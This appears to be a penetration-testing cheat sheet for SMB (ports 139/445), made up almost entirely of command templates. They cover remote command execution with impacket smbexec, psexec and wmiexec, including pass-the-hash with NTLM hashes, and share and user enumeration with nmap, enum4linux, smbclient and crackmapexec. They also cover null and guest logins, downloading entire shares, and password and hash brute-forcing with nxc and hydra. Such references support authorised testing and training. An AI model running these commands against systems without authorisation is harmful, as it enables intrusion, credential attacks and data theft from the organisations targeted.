# TCP: SMB - 139 / 445

## Connection

```bash
impacket-smbexec [<Domain Name>/]<Username>[:<Password>]@<Target IP Address>
```

{% code overflow="wrap" %}

```bash
impacket-smbexec [<Domain Name>/]<Username>@<Target IP Address> -hashes :<NTLM Hash>
```

{% endcode %}

```bash
impacket-psexec [<Domain Name>/]<Username>[:<Password>]@<Target IP Address>
```

```bash
impacket-psexec [<Domain Name>/]<Username>@<Target IP Address> -hashes :<NTLM Hash>
```

```bash
impacket-wmiexec [<Domain Name>/]<Username>[:<Password>]@<Target IP Address>
```

```bash
impacket-wmiexec [<Domain Name>/]<Username>@<Target IP Address> -hashes :<NTLM Hash>
```

## Enumeration

### Identify Version

```bash
sudo nmap -p 139,445 -sV -Pn <Target IP Address>
```

{% code overflow="wrap" %}

```bash
tcpdump -i tun0 port <Port> and src <Target IP Address> -s0 -A -n 2>/dev/null & crackmapexec smb <Target IP Address> --shares --port <Port> 1>/dev/null 2>/dev/null
```

{% endcode %}

### Nmap

```bash
nmap --script "safe or smb-enum-*" -p 445 <Target IP Address>
```

```bash
nmap --script "smb-vuln*" -p 139,445 <Target IP Address>
```

### enum4linux

```bash
enum4linux -a <Target IP Address>
```

```bash
enum4linux -a <Target IP Address> -u <Username> -p <Password>
```

### smbclient

Null Session

```bash
smbclient -N -L //<Target IP Address>
```

List all shares

```bash
smbclient -L //<Target IP Address>/
```

Connect to a specific share

```bash
smbclient //<Target IP Address>/<Share Name>/ -U [<Domain Name>\]<Username>
```

{% code overflow="wrap" %}

```bash
smbclient //<Target IP Address>/<Share Name>/ -U [<Domain Name>\]<Username> --pw-nt-hash <NTLM Hash>
```

{% endcode %}

List share permissions

```bash
smbmap -H <Target IP Address>
```

### smbget

Download target file

{% code overflow="wrap" %}

```bash
smbget smb://<Target IP Address>/<Share Name>/<File Name> [--user <Username>%<Password>]
```

{% endcode %}

Download target share

```bash
smbget -R smb://<Target IP Address>/<Share Name>
```

### crackmapexec

Enumerate SMB shares

```bash
crackmapexec smb <Target IP Address> [--users | --shares]
```

Null Authentication

```bash
crackmapexec smb <Target IP Address> --shares -u ' ' -p ''
```

```bash
crackmapexec smb <Target IP Address> --shares -u '' -p ''
```

Test whether authentication succeeds

```bash
crackmapexec smb <Target IP Address> -u ' ' -p ''
```

Guest authentication

```bash
crackmapexec smb <Target IP Address> -u 'guest' -p ''
```

Checking authentication

Local User Authentication

```bash
crackmapexec smb <Target IP Address> -u <Username> -p <Password> --local-auth
```

Domain User Authentication

```bash
crackmapexec smb <Target IP Address> -u <Domain Name>\\<Username> -p <Password>
```

## Bruteforce

### nxc

{% code overflow="wrap" %}

```bash
nxc smb <Target IP Address> -d <Domain Name> -u <Username List> -p <Password List> --continue-on-success
```

{% endcode %}

{% code overflow="wrap" %}

```bash
nxc smb <Target IP Address> -d <Domain Name> -u <Username List> -H <Hashes List> --continue-on-success
```

{% endcode %}

### hydra

```bash
hydra -L <Username List> -P <Password List> -f [-s <Port>] smb://<Target IP Address>
```

```bash
hydra -l <Username> -p <Password> -f [-s <Port>] smb://<Target IP Address>
```
